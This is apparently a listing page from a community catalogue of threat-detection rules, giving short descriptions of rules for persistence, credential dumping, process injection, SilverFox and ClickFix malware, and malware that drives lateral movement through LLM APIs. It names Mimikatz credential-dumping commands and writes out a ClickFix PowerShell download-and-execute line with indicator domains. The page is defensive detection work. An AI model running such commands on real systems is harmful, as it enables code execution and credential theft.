Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
60,142 detections
Filters
Last updated
All Time
Detection languages
23,200
16,896
4,280
4,077
3,289
Contributors
11,679
8,664
7,082
6,786
4,478
Categories
20,099
11,460
5,732
4,980
4,798
Platforms
39,723
6,855
6,349
4,079
3,510
Products / Services
10,351
9,601
6,991
4,335
3,859
MITRE Techniques
18,034
15,417
12,647
8,188
6,021
CVEs
68
68
58
56
50
IDS Classtypes
1,896
482
449
381
237
IDS Protocols
2,379
848
406
318
97
This rule detects the modification of Windows Registry Run keys, specifically targeting a value named 'MicrosoftUpdate' within the 'Run' registry path. This is a common persistence technique used by adversaries to ensure malicious programs or scripts automatically execute upon user logon by mimicking a legitimate system update process.
This rule detects the creation or presence of specific file artifacts ('PDF_C2089_20260911100446.exe' and 'active_desktop_render_x64.dll') within the '\AppData\Microsoft\Update\' directory. These file names and paths are characteristic of potential malware staging or persistence mechanisms, specifically associated with the SilverFox threat activity.
This rule detects network connections from internal devices to a specific remote IP address (134.122.155.135) over port 443. This is characteristic of communication with a known or suspicious Command and Control (C2) server.
This rule monitors DeviceProcessEvents for the execution of known malicious binaries associated with the SilverFox malware. It specifically looks for occurrences of three distinct SHA256 file hashes within the last 30 days.
Detects instances where the Adobe ColdFusion service (jrun.exe or java.exe) spawns common command-line shells, administrative tools, or utility processes. This behavior is indicative of potential exploitation of ColdFusion vulnerabilities, such as CVE-2023-26360 or CVE-2023-29298, where an adversary gains initial access and executes commands on the underlying system.
Detects credential dumping attempts against the Local Security Authority Subsystem Service (LSASS) process. The rule identifies processes attempting to access LSASS memory using specific access masks often associated with credential extraction, or the presence of the Mimikatz 'sekurlsa::logonpasswords' command in the process command line.
Detects the use of PowerShell to modify Microsoft Defender settings to add an exclusion path within the AppData directory. This behavior is often associated with malware or threat actors attempting to whitelist malicious payloads to evade security scanning.
Detects a trojanized Electron application performing anti-sandbox environment checks by querying GPU hardware information via WMI or PowerShell CIM cmdlets. This activity is characterized by the presence of the PYTHONUTF8 environment variable and is identified as a precursor step to attempting Microsoft Defender exclusions and launching a malicious payload.
Detects signs of the ClosedQuorum implant by correlating at least two redundant persistence mechanisms (Registry Run keys, Scheduled Tasks, WMI execution) on the same host within a 10-minute window. The rule focuses on artifacts originating from suspicious user-writable paths or unsigned binaries, while excluding known legitimate installation paths.
Detects signs of the ClosedQuorum implant by correlating at least two redundant persistence mechanisms (Registry Run keys, Scheduled Tasks, WMI execution) on the same host within a 10-minute window. The rule focuses on artifacts originating from suspicious user-writable paths or unsigned binaries, while excluding known legitimate installation paths.
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
KQL Query
Detects lateral movement (SMB, RDP, WinRM) performed by a host within 5 minutes of communicating with specific commercial LLM APIs. This rule targets behaviors indicative of automated lateral movement driven by an LLM-based C2, excluding common administrative tools, standard business hours, and frequently used processes.
Detects the execution of multiple distinct host reconnaissance commands (e.g., systeminfo, whoami, ipconfig, AV/EDR checks, and domain enumeration) within a short window (10 minutes) originating from the same parent process. This pattern is characteristic of automated reconnaissance collection, often performed during the initial phases of an attack or as part of a C2 workflow. The rule includes exclusions for common administrative, monitoring, and RMM tools to reduce false positives.
KQL Query from file: ClickFix RAT – Malicious MSI Execution
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
KQL Query from file: ClickFix RAT – Known Malicious File Hash
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
KQL Query


